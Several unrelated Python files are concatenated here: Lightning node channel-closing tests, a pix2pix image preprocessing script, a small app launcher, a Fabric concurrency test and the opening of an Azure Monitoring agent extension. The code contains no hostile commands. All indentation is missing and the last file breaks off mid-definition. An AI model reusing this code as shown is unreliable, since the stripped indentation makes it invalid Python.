# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
# This will block, as l12 will send an error but l2 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
# shutdown one!),
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['@WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None},
{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [175, 5212]
l2_range = [1303, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
from . import tfimage as im
import threading
import time
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
# print(basename)
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
print(sibling_path)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
# create the pool before we launch processing threads
# we must create the pool after run_caffe is defined
if a.operation == "edges":
edge_pool = multiprocessing.Pool(a.workers)
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = time.time()
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if not os.path.exists(dst_path):
src_paths.append(src_path)
dst_paths.append(dst_path)
global total
total = len(src_paths)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
main()
|
main.py
|
from corylus.app import app
from corylus.huey_tasks.consumer import task_consumer
from multiprocessing import Process
if __name__ == '__main__':
process = Process(target=task_consumer)
process.start()
app.run(debug=True)
process.join()
|
concurrency.py
|
import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from spec import Spec, ok_, skip
from fabric import Connection
_words = '/usr/share/dict/words'
def _worker(queue, cxn, start, num_words, count, expected):
tail = num_words - start
cmd = "tail -n {} {} | head -n {}".format(
tail, _words, count,
)
stdout = cxn.run(cmd, hide=True).stdout
result = [x.strip() for x in stdout.splitlines()]
queue.put((cxn, result, expected))
class concurrency(Spec):
# TODO: still useful to use Group API here? Where does this responsibility
# fall between Group and Executor (e.g. phrasing this specifically as a
# generic subcase of Invoke level task parameterization)?
# TODO: spin up multiple temp SSHDs / Paramiko servers / ???
def setup(self):
cxn1 = Connection('localhost')
cxn2 = Connection('localhost')
cxn3 = Connection('localhost')
self.cxns = (cxn1, cxn2, cxn3)
def connections_objects_do_not_share_connection_state(self):
cxn1, cxn2, cxn3 = self.cxns
[x.open() for x in self.cxns]
# Prove no exterior connection caching, socket reuse, etc
# NOTE: would phrase these as chained 'is not' but pep8 linter is being
# stupid :(
ok_(cxn1 is not cxn2)
ok_(cxn2 is not cxn3)
ok_(cxn1.client is not cxn2.client)
ok_(cxn2.client is not cxn3.client)
ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
ok_(ports[0] is not ports[1] is not ports[2])
def manual_threading_works_okay(self):
# TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
# before it will reliably pass
skip()
# Kind of silly but a nice base case for "how would someone thread this
# stuff; and are there any bizarre gotchas lurking in default
# config/context/connection state?"
# Specifically, cut up the local (usually 100k's long) words dict into
# per-thread chunks, then read those chunks via shell command, as a
# crummy "make sure each thread isn't polluting things like stored
# stdout" sanity test
queue = Queue()
# TODO: skip test on Windows or find suitable alternative file
with codecs.open(_words, encoding='utf-8') as fd:
data = [x.strip() for x in fd.readlines()]
threads = []
num_words = len(data)
chunksize = len(data) / len(self.cxns) # will be an int, which is fine
for i, cxn in enumerate(self.cxns):
start = i * chunksize
end = max([start + chunksize, num_words])
chunk = data[start:end]
kwargs = dict(
queue=queue,
cxn=cxn,
start=start,
num_words=num_words,
count=len(chunk),
expected=chunk,
)
thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
t.join(5) # Kinda slow, but hey, maybe the test runner is hot
while not queue.empty():
cxn, result, expected = queue.get(block=False)
for resultword, expectedword in zip_longest(result, expected):
err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
resultword, expectedword, cxn, expected[0], expected[-1],
)
assert resultword == expectedword, err
|
agent.py
|
#!/usr/bin/env python
#
# AzureMonitoringLinuxAgent Extension
#
# Copyright 2021 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import datetime
import signal
import pwd
import grp
import re
import filecmp
import stat
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import shutil
import crypt
import xml.dom.minidom
import re
import hashlib
from distutils.version import LooseVersion
from hashlib import sha256
from shutil import copyfile
from threading import Thread
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
import metrics_ext_utils.metrics_common_utils as metrics_utils
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This code is taken from the omsagent's extension wrapper.
# This same monkey patch fix is relevant for AMA extension as well.
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
PackagesDirectory = 'packages'
# The BundleFileName values will be replaced by actual values in the release pipeline. See apply_version.sh.
BundleFileNameDeb = 'azuremonitoragent.deb'
BundleFileNameRpm = 'azuremonitoragent.rpm'
BundleFileName = ''
TelegrafBinName = 'telegraf'
InitialRetrySleepSeconds = 30
PackageManager = ''
PackageManagerOptions = ''
MdsdCounterJsonPath = '/etc/opt/microsoft/azuremonitoragent/config-cache/metricCounters.json'
# Commands
AMAInstallCommand = ''
